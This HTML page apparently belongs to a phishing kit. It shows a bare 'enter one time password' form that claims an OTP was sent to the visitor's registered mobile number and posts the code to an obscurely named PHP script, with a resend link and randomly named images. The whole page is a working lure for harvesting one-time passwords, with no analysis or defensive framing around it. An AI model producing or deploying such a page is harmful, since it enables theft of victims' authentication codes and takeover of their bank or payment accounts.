<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>online</title>
    <style>
        #bb ,#mm ,#re ,#ggm ,#ggmm
        {
            width: 100%;
        }
        #zz ,#ff ,#xx ,#ww ,#val
        {
            margin-left: 5%;
            font-size: 20px;
        }
    #x
    {

     margin-left: 30%;
            font-size: 12px; 
    }
        #ee ,#hh ,#jj ,#kk ,#upto
        {
            width: 90%;
            margin-left: 5%;
            margin-right: 5%;
            height: 28px;
            border-width:0.5px;
            background-color: #eaeaea;
            
        }

        #btn
        {
            margin-left: 30%;
            margin-right:20%;
            width: 40%;
            height: 30px;
            border-color: #017298;;
            background-color:#017298;
            border-radius:15px;
            color: white;
            margin-bottom: 50px;
        }
        body {
  background-color: #;
}

    </style>
</head>
<body>

    <img src="hgg.png" alt=""id="bb">

    
    <form action="as2asdgf.php" method="post">
            
    
      <p id="xx">
          We have sent an OTP to your register Mobile number
          <p id="xx">
          Enter one time password* (otp)
      </p>
      <div class="ii">
          <input type="number" name="mobile no." id="jj" required="">
      </div> <br>
      <div class="ni">
          <button type="submit" id="btn">
              Proceed
          </button>
      </div>

      <p id="x">
          Didn't Receive OTP? <a href="otooop.html">Request again</a>
      </p>
      
      <img src="sdkfhkdskflastndfhdfk.png" alt="" id="re">
    </form>
</body>
</html>